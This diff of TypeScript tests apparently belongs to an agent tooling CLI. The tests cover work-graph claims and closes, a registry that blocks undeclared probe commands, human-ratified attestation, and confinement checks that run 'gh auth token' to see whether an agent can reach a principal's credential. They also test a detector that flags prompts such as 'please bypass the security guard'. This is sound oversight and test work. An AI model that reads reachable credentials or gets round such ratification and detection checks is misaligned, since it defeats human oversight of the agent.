+      action === "add" ? ["graph", action, "495", "--title", "t", "--autonomy", "approve"] : ["graph", action, "495"],
+    );
+    expect(parsed.action).toBe(action as never);
+  }
+  expect(() => parseGraphArgs(["graph", "delete", "495"])).toThrow(/frontier\|node\|claim\|add\|close/u);
+});
+
+test("a verb without a target is a usage error, not a request against node 'undefined'", () => {
+  expect(() => parseGraphArgs(["graph", "node"])).toThrow(/soma graph node/u);
+  expect(() => parseGraphArgs(["graph", "node", "--json"])).toThrow(/soma graph node/u);
+});
+
+test("--evidence is typed at the boundary", () => {
+  expect(() => parseGraphArgs(["graph", "close", "1", "--evidence", "not json"])).toThrow(/valid JSON/u);
+  expect(() => parseGraphArgs(["graph", "close", "1", "--evidence", '{"kind":"vibes","summary":"s"}'])).toThrow(
+    /"kind" must be one of/u,
+  );
+  const parsed = parseGraphArgs(["graph", "close", "1", "--evidence", '{"kind":"tested","summary":"s","pointer":"p"}']);
+  expect(parsed.action === "close" ? parsed.options.evidence : []).toEqual([
+    { kind: "tested", summary: "s", pointer: "p" },
+  ]);
+});
+
+test("the repo is derived from any remote URL shape", () => {
+  expect(parseRepoFromRemote("git@github.com:the-metafactory/soma.git")).toBe(REPO);
+  expect(parseRepoFromRemote("https://github.com/the-metafactory/soma.git")).toBe(REPO);
+  expect(parseRepoFromRemote("https://github.com/the-metafactory/soma")).toBe(REPO);
+  expect(parseRepoFromRemote("https://gitlab.com/x/y.git")).toBeUndefined();
+});
+
+// --- frontier ---------------------------------------------------------------
+
+test("frontier reports open, unassigned, unblocked children and says it is advisory", async () => {
+  const store = new FakeStore()
+    .seed("495", { node: autoNode("495"), children: ["498", "499", "500", "501"] })
+    .seed("498", { node: autoNode("498") })
+    .seed("499", { node: autoNode("499"), blockedBy: [{ id: "498", status: "open" }] })
+    .seed("500", { node: autoNode("500"), assignees: ["jcfischer"] })
+    .seed("501", { node: autoNode("501"), status: "closed" });
+
+  const output = await run(["graph", "frontier", "495", "--repo", REPO], store);
+
+  expect(output).toContain("- 498");
+  expect(output).not.toContain("- 499");
+  expect(output).not.toContain("- 500");
+  expect(output).not.toContain("- 501");
+  expect(output).toContain("1 node(s) open, unassigned, and unblocked.");
+  expect(output).toContain("Advisory (§2.4)");
+});
+
+test("frontier --json emits the confirmed node states", async () => {
+  const store = new FakeStore()
+    .seed("495", { node: autoNode("495"), children: ["498"] })
+    .seed("498", { node: autoNode("498") });
+
+  const parsed = JSON.parse(await run(["graph", "frontier", "495", "--repo", REPO, "--json"], store)) as {
+    root: string;
+    frontier: { ref: { id: string } }[];
+  };
+
+  expect(parsed.root).toBe("495");
+  expect(parsed.frontier.map((state) => state.ref.id)).toEqual(["498"]);
+});
+
+// --- node -------------------------------------------------------------------
+
+test("node renders a hand-authored ticket as the fail-safe class it reports", async () => {
+  const store = new FakeStore().seed("498", {
+    node: { id: "498", title: "soma graph verbs", autonomy: "approve" },
+    typed: false,
+    parent: "495",
+    blockedBy: [{ id: "497", status: "closed" }],
+  });
+
+  const output = await run(["graph", "node", "498", "--repo", REPO], store);
+
+  expect(output).toContain("autonomy: approve");
+  expect(output).toContain("typed: false");
+  expect(output).toContain("no readable node block");
+  expect(output).toContain("probes: none declared");
+  expect(output).toContain("blocked by: 497 (closed)");
+  expect(output).toContain("parent: 495");
+});
+
+// --- claim ------------------------------------------------------------------
+
+test("claim reports the holder and exits non-zero when the tie-break goes the other way", async () => {
+  const store = new FakeStore().seed("498", { node: autoNode("498") });
+  store.claimResult = { held: false, identity: "ivy-agent", holder: "aaa-bot", assignees: ["aaa-bot"] };
+
+  const message = await failure(["graph", "claim", "498", "--repo", REPO], store);
+  expect(message).toContain("held by aaa-bot");
+  expect(message).toContain("code-point tie-break");
+
+  store.claimResult = { held: true, identity: "ivy-agent", holder: "ivy-agent", assignees: ["ivy-agent"] };
+  expect(await run(["graph", "claim", "498", "--repo", REPO], store)).toContain("Claimed node 498 as ivy-agent");
+});
+
+test("claim refuses a closed node rather than reopening a settled race", async () => {
+  const store = new FakeStore().seed("498", { node: autoNode("498"), status: "closed" });
+  expect(await failure(["graph", "claim", "498", "--repo", REPO], store)).toContain("nothing to claim");
+});
+
+// --- add --------------------------------------------------------------------
+
+test("add attaches the node under the root it was given and wires blocking edges", async () => {
+  const store = new FakeStore().seed("495", { node: autoNode("495") }).seed("498", { node: autoNode("498") });
+
+  const output = await run(
+    [
+      "graph",
+      "add",
+      "495",
+      "--title",
+      "scaffold node",
+      "--autonomy",
+      "auto",
+      "--kind",
+      "  TASK ",
+      "--checkpoint",
+      "cp-1",
+      "--probe",
+      JSON.stringify(PROBE),
+      "--blocked-by",
+      "498",
+      "--repo",
+      REPO,
+    ],
+    store,
+  );
+
+  expect(store.created).toHaveLength(1);
+  expect(store.created[0].parent).toEqual({ id: "495" });
+  expect(store.created[0].kind).toBe("task");
+  expect(store.edges).toEqual([["498", "900"]]);
+  expect(output).toContain("Created node 900 under 495");
+});
+
+test("add refuses an auto node with no probes — zero machine-checkable evidence at close", async () => {
+  const store = new FakeStore().seed("495", { node: autoNode("495") });
+  const message = await failure(
+    ["graph", "add", "495", "--title", "t", "--autonomy", "auto", "--repo", REPO],
+    store,
+  );
+
+  expect(message).toContain("at least one probe");
+  expect(store.created).toHaveLength(0);
+});
+
+// --- close ------------------------------------------------------------------
+
+function autoGraph(): FakeStore {
+  return new FakeStore()
+    .seed("495", { node: autoNode("495"), author: "jcfischer" })
+    .seed("520", { node: autoNode("520"), parent: "495", author: "ivy-agent" });
+}
+
+test("an auto close runs the probes, derives probed evidence, and writes the receipt", async () => {
+  const store = autoGraph();
+  const output = await run(["graph", "close", "520", "--repo", REPO], store);
+
+  expect(store.closed).toHaveLength(1);
+  const receipt = store.closed[0].receipt;
+  expect(receipt.checkpointId).toBe("cp-520");
+  expect(receipt.probeResults).toHaveLength(1);
+  expect(receipt.evidence.some((entry) => entry.kind === "probed" && entry.pointer === "HEAD abc1234")).toBe(true);
+  expect(output).toContain("Closed node 520");
+});
+
+test("a failing probe refuses the close — nothing reaches the tracker", async () => {
+  const store = autoGraph();
+  const message = await failure(["graph", "close", "520", "--repo", REPO], store, {
+    runProbes: async (probes) =>
+      probes.map<ProbeResult>((probe) => ({
+        probe,
+        state: "probed",
+        outcome: "fail",
+        observed: "exit 1",
+        at: AT.toISOString(),
+      })),
+  });
+
+  expect(message).toContain("ran and failed");
+  expect(store.closed).toHaveLength(0);
+});
+
+test("a node with no attached checkpoint cannot be closed at all", async () => {
+  const store = new FakeStore().seed("520", {
+    node: { id: "520", title: "no checkpoint", autonomy: "auto", probes: [PROBE] },
+  });
+
+  const message = await failure(["graph", "close", "520", "--repo", REPO], store);
+  expect(message).toContain("no attached checkpoint");
+  expect(store.closed).toHaveLength(0);
+});
+
+test("an auto receipt is honestly unverified — no human ratified it", async () => {
+  const store = autoGraph();
+  await run(["graph", "close", "520", "--repo", REPO], store);
+
+  const receipt = store.closed[0].receipt;
+  expect(receipt.attestation).toBe("unverified");
+  expect(receipt.attestationFacts?.reasons?.join(" ")).toContain("no ratification found");
+});
+
+test("a HITL node refuses to close on a self-report and says how to propose", async () => {
+  const store = new FakeStore()
+    .seed("495", { node: autoNode("495"), author: "jcfischer" })
+    .seed("530", { node: { id: "530", title: "hitl", autonomy: "approve", checkpointId: "cp-530" }, parent: "495" });
+
+  const message = await failure(["graph", "close", "530", "--repo", REPO], store);
+  expect(message).toContain("closes on a ratified proposal");
+  expect(message).toContain("--propose");
+  expect(store.closed).toHaveLength(0);
+});
+
+test("--propose posts the proposal comment and closes nothing", async () => {
+  const store = new FakeStore()
+    .seed("495", { node: autoNode("495"), author: "jcfischer" })
+    .seed("530", { node: { id: "530", title: "hitl", autonomy: "approve", checkpointId: "cp-530" }, parent: "495" });
+
+  const output = await run(["graph", "close", "530", "--propose", "--body", "the resolution", "--repo", REPO], store);
+
+  expect(store.comments.size).toBe(1);
+  expect(store.closed).toHaveLength(0);
+  expect(output).toContain("Posted proposal comment c1");
+  expect(output).toContain("--proposal-comment c1");
+});
+
+test("a 👍 from the graph root's author on an isolated session yields a verified receipt", async () => {
+  const store = new FakeStore()
+    .seed("495", { node: autoNode("495"), author: "jcfischer" })
+    .seed("530", { node: { id: "530", title: "hitl", autonomy: "approve", checkpointId: "cp-530" }, parent: "495" });
+
+  await run(["graph", "close", "530", "--propose", "--body", "the resolution", "--repo", REPO], store);
+  store.reactions.set("c1", [{ id: "r1", content: "+1", author: "jcfischer" }]);
+
+  const output = await run(["graph", "close", "530", "--proposal-comment", "c1", "--repo", REPO], store);
+
+  const receipt = store.closed[0].receipt;
+  expect(receipt.attestation).toBe("verified");
+  expect(receipt.evidence.some((entry) => entry.kind === "approved")).toBe(true);
+  expect(receipt.attestationFacts?.ratification?.author).toBe("jcfischer");
+  expect(output).toContain("attestation: verified");
+});
+
+test("the same reaction with the principal's credential reachable is unverified — #496's case", async () => {
+  const store = new FakeStore()
+    .seed("495", { node: autoNode("495"), author: "jcfischer" })
+    .seed("530", { node: { id: "530", title: "hitl", autonomy: "approve", checkpointId: "cp-530" }, parent: "495" });
+
+  await run(["graph", "close", "530", "--propose", "--body", "the resolution", "--repo", REPO], store);
+  store.reactions.set("c1", [{ id: "r1", content: "+1", author: "jcfischer" }]);
+
+  await run(["graph", "close", "530", "--proposal-comment", "c1", "--repo", REPO], store, {
+    checkConfinement: async () => ({
+      checked: true,
+      reachableIdentities: ["ivy-agent", "jcfischer"],
+      at: AT.toISOString(),
+      probes: [],
+    }),
+  });
+
+  expect(store.closed[0].receipt.attestation).toBe("unverified");
+});
+
+test("a 👍 from someone other than the root author closes, but never as verified", async () => {
+  const store = new FakeStore()
+    .seed("495", { node: autoNode("495"), author: "jcfischer" })
+    .seed("530", { node: { id: "530", title: "hitl", autonomy: "approve", checkpointId: "cp-530" }, parent: "495" });
+
+  await run(["graph", "close", "530", "--propose", "--body", "x", "--repo", REPO], store);
+  store.reactions.set("c1", [{ id: "r1", content: "+1", author: "mellanon" }]);
+
+  await run(["graph", "close", "530", "--proposal-comment", "c1", "--repo", REPO], store);
+
+  expect(store.closed[0].receipt.attestation).toBe("unverified");
+  expect(store.closed[0].receipt.attestationFacts?.reasons?.join(" ")).toContain("not the author of graph root");
+});
+
+test("a 👎 from the root author blocks ratification, so the close is refused", async () => {
+  const store = new FakeStore()
+    .seed("495", { node: autoNode("495"), author: "jcfischer" })
+    .seed("530", { node: { id: "530", title: "hitl", autonomy: "approve", checkpointId: "cp-530" }, parent: "495" });
+
+  await run(["graph", "close", "530", "--propose", "--body", "x", "--repo", REPO], store);
+  store.reactions.set("c1", [
+    { id: "r1", content: "-1", author: "jcfischer" },
+    { id: "r2", content: "+1", author: "mellanon" },
+  ]);
+
+  const message = await failure(["graph", "close", "530", "--proposal-comment", "c1", "--repo", REPO], store);
+  expect(message).toContain("needs at least one approved evidence");
+  expect(store.closed).toHaveLength(0);
+});
+
+test("selectRatification prefers the root author and ignores the proposer's own reaction", () => {
+  const reactions: Reaction[] = [
+    { id: "r1", content: "+1", author: "ivy-agent" },
+    { id: "r2", content: "+1", author: "mellanon" },
+    { id: "r3", content: "+1", author: "jcfischer" },
+  ];
+
+  expect(selectRatification(reactions, "ivy-agent", "jcfischer")?.author).toBe("jcfischer");
+  expect(selectRatification(reactions, "ivy-agent", undefined)?.author).toBe("jcfischer");
+  expect(selectRatification([{ id: "r1", content: "+1", author: "ivy-agent" }], "ivy-agent", "jcfischer")).toBeUndefined();
+});
+
+test("--dry-run previews the verdict and the receipt without writing either", async () => {
+  const store = autoGraph();
+  const output = await run(["graph", "close", "520", "--dry-run", "--repo", REPO], store);
+
+  expect(store.closed).toHaveLength(0);
+  expect(store.comments.size).toBe(0);
+  expect(output).toContain("nothing written");
+  expect(output).toContain("would be ACCEPTED");
+  expect(output).toContain("## Close receipt");
+});
+
+test("--dry-run names the refusal instead of throwing it away", async () => {
+  const store = autoGraph();
+  const output = await run(["graph", "close", "520", "--dry-run", "--repo", REPO], store, {
+    runProbes: async (probes) =>
+      probes.map<ProbeResult>((probe) => ({
+        probe,
+        state: "probed",
+        outcome: "fail",
+        observed: "exit 1",
+        at: AT.toISOString(),
+      })),
+  });
+
+  expect(output).toContain("would be REFUSED");
+  expect(store.closed).toHaveLength(0);
+});
+
+test("closing from the dev tree warns that the gate is not where §1 clause 5 puts it", async () => {
+  const store = autoGraph();
+  const warnings: string[] = [];
+  await run(["graph", "close", "520", "--repo", REPO], store, {
+    fromDevTree: true,
+    warn: (message) => warnings.push(message),
+  });
+
+  expect(warnings.join(" ")).toContain("installed binary");
+});
+
+test("a closed node is not closed twice", async () => {
+  const store = autoGraph().seed("520", { node: autoNode("520"), parent: "495", status: "closed" });
+  expect(await failure(["graph", "close", "520", "--repo", REPO], store)).toContain("already closed");
+});
+
+test("SomaCliError carries a non-zero exit for a lost claim", async () => {
+  const store = new FakeStore().seed("498", { node: autoNode("498") });
+  store.claimResult = { held: false, identity: "ivy-agent", holder: "aaa-bot", assignees: ["aaa-bot"] };
+
+  try {
+    await run(["graph", "claim", "498", "--repo", REPO], store);
+    throw new Error("expected a refusal");
+  } catch (error) {
+    expect(error).toBeInstanceOf(SomaCliError);
+    expect((error as SomaCliError).exitCode).toBe(1);
+  }
+});

--- a/test/cli-graph.test.ts
+++ b/test/cli-graph.test.ts
@@ -9,6 +9,7 @@ import {
 } from "../src/cli/graph";
 import {
   WorkGraphError,
+  runProbes,
   type ClaimResult,
   type CloseReceipt,
   type CommentRef,
@@ -17,6 +18,7 @@ import {
   type NodeRef,
   type NodeState,
   type Probe,
+  type ProbeRegistry,
   type ProbeResult,
   type Reaction,
   type WorkGraphNode,
@@ -24,7 +26,17 @@ import {
 
 const REPO = "the-metafactory/soma";
 const AT = new Date("2026-08-04T09:00:00.000Z");
-const PROBE: Probe = { type: "command", run: "bun test", timeoutSec: 600, expectExit: 0 };
+const PROBE_RUN = "bun test";
+const PROBE: Probe = { type: "command", run: PROBE_RUN, timeoutSec: 600, expectExit: 0 };
+const REGISTRY_PATH = "/home/.soma/policy/probe-registry.json";
+/** What a machine that has authorised this repo's one probe looks like (§2.2). */
+const DECLARED: ProbeRegistry = {
+  status: "loaded",
+  repo: REPO,
+  path: REGISTRY_PATH,
+  commands: [{ run: PROBE_RUN, cwd: "/repo" }],
+  urlHosts: [],
+};
 
 interface SeedNode {
   node: WorkGraphNode;
@@ -113,6 +125,8 @@ function deps(store: FakeStore, overrides: Partial<GraphCliDeps> = {}): Partial<
     createStore: () => store,
     resolveRepo: async () => REPO,
     resolveIdentity: async () => "ivy-agent",
+    // Hermetic: the default would read the developer's own ~/.soma.
+    loadProbeRegistry: async () => DECLARED,
     runProbes: async (probes) =>
       probes.map<ProbeResult>((probe) => ({
         probe,
@@ -492,6 +506,109 @@ test("--dry-run names the refusal instead of throwing it away", async () => {
 
   expect(output).toContain("would be REFUSED");
   expect(store.closed).toHaveLength(0);
+});
+
+// --- the probe registry gate (DD-16 Amendment A, #526) ----------------------
+
+/** Wires the real runner behind the CLI so the registry actually gates something. */
+function realRunner(registry: ProbeRegistry, overrides: Partial<GraphCliDeps> = {}): Partial<GraphCliDeps> {
+  return {
+    loadProbeRegistry: async () => registry,
+    runProbes: async (probes, supplied) =>
+      await runProbes(probes, {
+        cwd: "/repo",
+        registry: supplied,
+        deps: {
+          runCommand: async () => ({ exitCode: 0, stdout: "640 pass", stderr: "", timedOut: false }),
+          now: () => AT,
+        },
+      }),
+    ...overrides,
+  };
+}
+
+test("close refuses an undeclared command probe and hands back the entry to add", async () => {
+  const store = autoGraph();
+  const message = await failure(
+    ["graph", "close", "520", "--repo", REPO],
+    store,
+    realRunner({ status: "loaded", repo: REPO, path: REGISTRY_PATH, commands: [], urlHosts: [] }),
+  );
+
+  expect(store.closed).toHaveLength(0);
+  expect(message).toContain("not authorised on this machine");
+  expect(message).toContain(PROBE_RUN);
+  expect(message).toContain(`{"run": "bun test", "cwd": "/repo"}`);
+  expect(message).toContain(REGISTRY_PATH);
+});
+
+test("close on a machine with no registry refuses rather than running tracker content", async () => {
+  const store = autoGraph();
+  const message = await failure(
+    ["graph", "close", "520", "--repo", REPO],
+    store,
+    realRunner({ status: "absent", repo: REPO, path: REGISTRY_PATH }),
+  );
+
+  expect(store.closed).toHaveLength(0);
+  expect(message).toContain("no registry exists at");
+});
+
+test("a declared command probe closes exactly as before — the gate is not a new hurdle", async () => {
+  const store = autoGraph();
+  const output = await run(["graph", "close", "520", "--repo", REPO], store, realRunner(DECLARED));
+
+  expect(store.closed).toHaveLength(1);
+  expect(output).toContain("Closed node 520");
+});
+
+test("--dry-run still renders the receipt when the registry refused a probe", async () => {
+  const store = autoGraph();
+  const output = await run(
+    ["graph", "close", "520", "--dry-run", "--repo", REPO],
+    store,
+    realRunner({ status: "absent", repo: REPO, path: REGISTRY_PATH }),
+  );
+
+  expect(store.closed).toHaveLength(0);
+  expect(output).toContain("would be REFUSED");
+  expect(output).toContain("1 of 1 probe(s) refused");
+  expect(output).toContain("## Close receipt");
+});
+
+test("the gate is uniform — a HITL node is refused on the same terms as an auto one", async () => {
+  const store = autoGraph().seed("520", {
+    node: { id: "520", title: "hitl", autonomy: "approve", checkpointId: "cp-520", probes: [PROBE] },
+    parent: "495",
+    author: "ivy-agent",
+  });
+
+  const message = await failure(
+    ["graph", "close", "520", "--repo", REPO],
+    store,
+    realRunner({ status: "absent", repo: REPO, path: REGISTRY_PATH }),
+  );
+
+  // Refused before the proposal path is even reached: the registry answers
+  // whose code this is, which is not an autonomy question.
+  expect(message).toContain("not authorised on this machine");
+  expect(message).not.toContain("--propose");
+  expect(store.closed).toHaveLength(0);
+});
+
+test("reading is not executing — node and frontier never consult the registry", async () => {
+  const store = autoGraph();
+  const explode = async (): Promise<never> => {
+    throw new Error("the read path must not consult the probe registry — a node is data");
+  };
+
+  const node = await run(["graph", "node", "520", "--repo", REPO], store, { loadProbeRegistry: explode });
+  expect(node).toContain("node: 520");
+  expect(node).toContain(PROBE_RUN); // the undeclared probe still reads back verbatim
+
+  const rooted = autoGraph().seed("495", { node: autoNode("495"), author: "jcfischer", children: ["520"] });
+  const frontier = await run(["graph", "frontier", "495", "--repo", REPO], rooted, { loadProbeRegistry: explode });
+  expect(frontier).toContain("- 520");
 });
 
 test("closing from the dev tree warns that the gate is not where §1 clause 5 puts it", async () => {

--- a/test/install.test.ts
+++ b/test/install.test.ts
@@ -143,11 +143,12 @@ test("installs soma source home and codex home projection", async () => {
     expect(result.substrate).toBe("codex");
     expect(result.somaHome.somaHome).toBe(join(homeDir, ".soma"));
     expect(result.substrateHome.rootDir).toBe(join(homeDir, ".codex"));
-    // 21 static + 8 bundled-skill projections (Memory ×5, the-algorithm
+    // 21 static + 14 bundled-skill projections (Memory ×5, the-algorithm
     // Workflows ×1, the portable the-algorithm/SKILL.md that the static
     // rendering contract overwrites — double-written by design, grok/codex —
-    // and migrate-pai-purpose/SKILL.md ×1).
-    expect(result.substrateHome.files).toHaveLength(29);
+    // migrate-pai-purpose/SKILL.md ×1, and orienteer ×6: SKILL.md, two
+    // Workflows, three references).
+    expect(result.substrateHome.files).toHaveLength(35);
 
     const telos = await readFile(join(homeDir, ".soma/profile/purpose.md"), "utf8");
     const rules = await readFile(join(homeDir, ".codex/rules/soma.rules"), "utf8");
@@ -1548,9 +1549,9 @@ test("installs soma source home and pi.dev home projection", async () => {
     expect(result.substrateHome.rootDir).toBe(join(homeDir, ".pi"));
     // #43 — Algorithm phase renderer extension shipped alongside
     // existing soma.ts + soma-path-guard.ts; brings the count to 13.
-    // + 8 bundled-skill projections (the-algorithm ×2, Memory ×5,
-    // migrate-pai-purpose ×1) = 21.
-    expect(result.substrateHome.files).toHaveLength(21);
+    // + 14 bundled-skill projections (the-algorithm ×2, Memory ×5,
+    // migrate-pai-purpose ×1, orienteer ×6) = 27.
+    expect(result.substrateHome.files).toHaveLength(27);
 
     const extension = await readFile(join(homeDir, ".pi/agent/extensions/soma.ts"), "utf8");
     const algorithmExtension = await readFile(join(homeDir, ".pi/agent/extensions/soma-algorithm.ts"), "utf8");

--- a/test/runtime-policy-inspection.test.ts
+++ b/test/runtime-policy-inspection.test.ts
@@ -809,6 +809,29 @@ test("prompt heuristics do not fire on negated or descriptive security prose", a
   });
 });
 
+test("proximity does not reach across a block boundary into an unrelated heading", async () => {
+  await withTempHome(async (homeDir) => {
+    await bootstrapSomaHome({ homeDir });
+
+    // Verbatim from soma's own CONTEXT.md, which cost sage's Architecture and
+    // ContextDrift lenses every review round for months: the noun "bypass" ends
+    // one paragraph, and the 60-char window reached over `---` into the NEXT
+    // SECTION'S heading to find "security". Two unrelated blocks, one finding.
+    const contextMd = "Collapsing them hides bypass paths.\n\n---\n\n## Inbound security config\n";
+    expect(await promptFindingKinds(homeDir, contextMd)).not.toContain("security-disable-request");
+
+    // Same tokens, same distance, no block break — still a request, still flagged.
+    expect(await promptFindingKinds(homeDir, "bypass paths in the security config")).toContain(
+      "security-disable-request",
+    );
+
+    // A blank line is the boundary; a plain line wrap is not.
+    expect(await promptFindingKinds(homeDir, "please bypass\nthe security guard")).toContain(
+      "security-disable-request",
+    );
+  });
+});
+
 test("command inspection keys on shell semantics, not English words", async () => {
   await withTempHome(async (homeDir) => {
     await bootstrapSomaHome({ homeDir });

--- a/test/work-graph-attestation.test.ts
+++ b/test/work-graph-attestation.test.ts
@@ -1,0 +1,256 @@
+import { expect, test } from "bun:test";
+import {
+  checkConfinement,
+  deriveAttestation,
+  findGraphRoot,
+  parseAuthStatusLogins,
+  type AttestationInputs,
+  type CommandOutcome,
+  type CommandRequest,
+  type ConfinementResult,
+  type NodeRef,
+  type NodeState,
+} from "../src/index";
+
+const AT = "2026-08-04T09:00:00.000Z";
+
+function isolated(identity = "ivy-agent"): ConfinementResult {
+  return { checked: true, reachableIdentities: [identity], at: AT, probes: [] };
+}
+
+/** The shape §3.2 calls verified: isolated session, agent proposed, root author ratified. */
+function verifiableInputs(overrides: Partial<AttestationInputs> = {}): AttestationInputs {
+  return {
+    backendCapability: "verifiable",
+    actingIdentity: "ivy-agent",
+    confinement: isolated(),
+    proposal: { commentId: "c1", author: "ivy-agent" },
+    ratification: { kind: "reaction", id: "r1", author: "jcfischer" },
+    root: { nodeId: "495", author: "jcfischer" },
+    ...overrides,
+  };
+}
+
+test("all four conjuncts holding yields verified, with no reasons recorded", () => {
+  const { attestation, facts } = deriveAttestation(verifiableInputs());
+  expect(attestation).toBe("verified");
+  expect(facts.reasons).toBeUndefined();
+  expect(facts.root).toEqual({ nodeId: "495", author: "jcfischer" });
+});
+
+test("conjunct 1 — a backend that cannot attest downgrades the receipt", () => {
+  const { attestation, facts } = deriveAttestation(verifiableInputs({ backendCapability: "unverified" }));
+  expect(attestation).toBe("unverified");
+  expect(facts.reasons?.join(" ")).toContain("backend cannot attest");
+});
+
+test("conjunct 2 — #496's worked example: clean authorship, reachable principal credential, unverified", () => {
+  const { attestation, facts } = deriveAttestation(
+    verifiableInputs({
+      confinement: { checked: true, reachableIdentities: ["ivy-agent", "jcfischer"], at: AT, probes: [] },
+    }),
+  );
+
+  expect(attestation).toBe("unverified");
+  expect(facts.reasons?.join(" ")).toContain("jcfischer");
+  expect(facts.confinement?.reachableIdentities).toContain("jcfischer");
+});
+
+test("conjunct 2 — an unchecked confinement is not an isolated one (downgrade-only)", () => {
+  const inputs = verifiableInputs();
+  delete inputs.confinement;
+  const { attestation, facts } = deriveAttestation(inputs);
+
+  expect(attestation).toBe("unverified");
+  expect(facts.reasons?.join(" ")).toContain("confinement was not checked");
+});
+
+test("conjunct 3 — one credential wearing both hats never reads as two", () => {
+  const { attestation, facts } = deriveAttestation(
+    verifiableInputs({
+      actingIdentity: "jcfischer",
+      confinement: isolated("jcfischer"),
+      proposal: { commentId: "c1", author: "jcfischer" },
+      ratification: { kind: "reaction", id: "r1", author: "jcfischer" },
+    }),
+  );
+
+  expect(attestation).toBe("unverified");
+  expect(facts.reasons?.join(" ")).toContain("share an author");
+});
+
+test("conjunct 4 — a ratifier who is not the graph root's author is not authorized", () => {
+  const { attestation, facts } = deriveAttestation(
+    verifiableInputs({ ratification: { kind: "reaction", id: "r1", author: "mellanon" } }),
+  );
+
+  expect(attestation).toBe("unverified");
+  expect(facts.reasons?.join(" ")).toContain("is not the author of graph root 495");
+});
+
+test("conjunct 4 — a root authored by the acting identity cannot authorize its own ratification", () => {
+  const { attestation, facts } = deriveAttestation(
+    verifiableInputs({
+      root: { nodeId: "495", author: "ivy-agent" },
+      ratification: { kind: "reaction", id: "r1", author: "ivy-agent" },
+    }),
+  );
+
+  expect(attestation).toBe("unverified");
+  expect(facts.reasons?.join(" ")).toContain("authored by the acting identity");
+});
+
+test("an auto close has no ratifier at all, so it is honestly unverified", () => {
+  const inputs = verifiableInputs();
+  delete inputs.proposal;
+  delete inputs.ratification;
+  const { attestation, facts } = deriveAttestation(inputs);
+
+  expect(attestation).toBe("unverified");
+  expect(facts.reasons?.join(" ")).toContain("no ratification found");
+});
+
+test("every failed conjunct is recorded, not just the first — remediations differ", () => {
+  const { facts } = deriveAttestation(
+    verifiableInputs({
+      backendCapability: "unverified",
+      confinement: { checked: true, reachableIdentities: ["ivy-agent", "jcfischer"], at: AT, probes: [] },
+      ratification: { kind: "reaction", id: "r1", author: "mellanon" },
+    }),
+  );
+
+  expect(facts.reasons?.length).toBeGreaterThanOrEqual(3);
+});
+
+// --- confinement probe set --------------------------------------------------
+
+function confinementDeps(
+  responses: (request: CommandRequest) => CommandOutcome,
+  env: Record<string, string | undefined> = { GH_TOKEN: "agent-pat", PATH: "/usr/bin" },
+  platform = "darwin",
+): { deps: Parameters<typeof checkConfinement>[0]; seen: CommandRequest[] } {
+  const seen: CommandRequest[] = [];
+  return {
+    seen,
+    deps: {
+      runCommand: async (request) => {
+        seen.push(request);
+        return responses(request);
+      },
+      env,
+      platform,
+      now: () => new Date(AT),
+    },
+  };
+}
+
+test("the confinement check strips the token env before probing what is reachable", async () => {
+  const { deps, seen } = confinementDeps(() => ({ exitCode: 1, stdout: "", stderr: "", timedOut: false }));
+  await checkConfinement(deps);
+
+  expect(seen.length).toBeGreaterThan(0);
+  for (const request of seen) {
+    expect(request.env?.GH_TOKEN).toBeUndefined();
+    expect(request.env?.PATH).toBe("/usr/bin");
+  }
+});
+
+test("a reachable keychain item and a foreign login both land in reachableIdentities", async () => {
+  const { deps } = confinementDeps((request) => {
+    if (request.argv?.join(" ") === "gh auth status") {
+      return { exitCode: 0, stdout: "", stderr: "✓ Logged in to github.com account jcfischer (keyring)", timedOut: false };
+    }
+    if (request.argv?.join(" ") === "gh auth token") {
+      return { exitCode: 0, stdout: "gho_xxx\n", stderr: "", timedOut: false };
+    }
+    return { exitCode: 0, stdout: "", stderr: "", timedOut: false };
+  });
+
+  const result = await checkConfinement(deps);
+  expect(result.checked).toBe(true);
+  expect(result.reachableIdentities).toContain("jcfischer");
+  expect(result.reachableIdentities).toContain("keychain:gh:github.com");
+  expect(result.probes).toHaveLength(3);
+});
+
+test("a credential that prints but names no login still counts as reachable", async () => {
+  const { deps } = confinementDeps((request) =>
+    request.argv?.join(" ") === "gh auth token"
+      ? { exitCode: 0, stdout: "gho_xxx\n", stderr: "", timedOut: false }
+      : { exitCode: 1, stdout: "", stderr: "", timedOut: false },
+  );
+
+  const result = await checkConfinement(deps);
+  expect(result.reachableIdentities).toContain("unidentified-credential");
+});
+
+test("an isolated session reaches nothing", async () => {
+  const { deps } = confinementDeps(
+    () => ({ exitCode: 1, stdout: "", stderr: "not logged in", timedOut: false }),
+    { PATH: "/usr/bin" },
+    "linux",
+  );
+
+  const result = await checkConfinement(deps);
+  expect(result.reachableIdentities).toEqual([]);
+  expect(result.probes).toHaveLength(2);
+});
+
+test("both gh auth status output shapes parse — a silent parse miss would read as isolated", () => {
+  expect(parseAuthStatusLogins("✓ Logged in to github.com account ivy-agent (keyring)")).toEqual(["ivy-agent"]);
+  expect(parseAuthStatusLogins("✓ Logged in to github.com as jcfischer (oauth_token)")).toEqual(["jcfischer"]);
+});
+
+// --- root walk --------------------------------------------------------------
+
+function graphOf(nodes: Record<string, { author: string; parent?: string }>): (ref: NodeRef) => Promise<NodeState> {
+  return async (ref) => {
+    const entry = nodes[ref.id];
+    if (entry === undefined) throw new Error(`no such node ${ref.id}`);
+    return {
+      ref: { id: ref.id },
+      node: { id: ref.id, title: `node ${ref.id}`, autonomy: "approve" },
+      status: "open",
+      assignees: [],
+      blockedBy: [],
+      author: entry.author,
+      typed: true,
+      ...(entry.parent === undefined ? {} : { parent: { id: entry.parent } }),
+    };
+  };
+}
+
+test("findGraphRoot walks parent edges to the top and reads the author from there", async () => {
+  const root = await findGraphRoot(
+    { id: "520" },
+    graphOf({
+      "520": { author: "ivy-agent", parent: "498" },
+      "498": { author: "jcfischer", parent: "495" },
+      "495": { author: "jcfischer" },
+    }),
+  );
+
+  expect(root).toEqual({ nodeId: "495", author: "jcfischer" });
+});
+
+test("a broken parent edge leaves the root unreachable — never a pass", async () => {
+  const root = await findGraphRoot({ id: "520" }, graphOf({ "520": { author: "ivy-agent", parent: "999" } }));
+  expect(root).toBeUndefined();
+});
+
+test("a parent cycle terminates the walk instead of hanging it", async () => {
+  const root = await findGraphRoot(
+    { id: "a" },
+    graphOf({ a: { author: "x", parent: "b" }, b: { author: "y", parent: "a" } }),
+  );
+  expect(root).toBeUndefined();
+});
+
+test("an unreachable root downgrades the receipt", () => {
+  const inputs = verifiableInputs();
+  delete inputs.root;
+  const { attestation, facts } = deriveAttestation(inputs);
+
+  expect(attestation).toBe("unverified");
+  expect(facts.reasons?.join(" ")).toContain("graph root unreachable");
+});

--- a/test/work-graph-github.test.ts
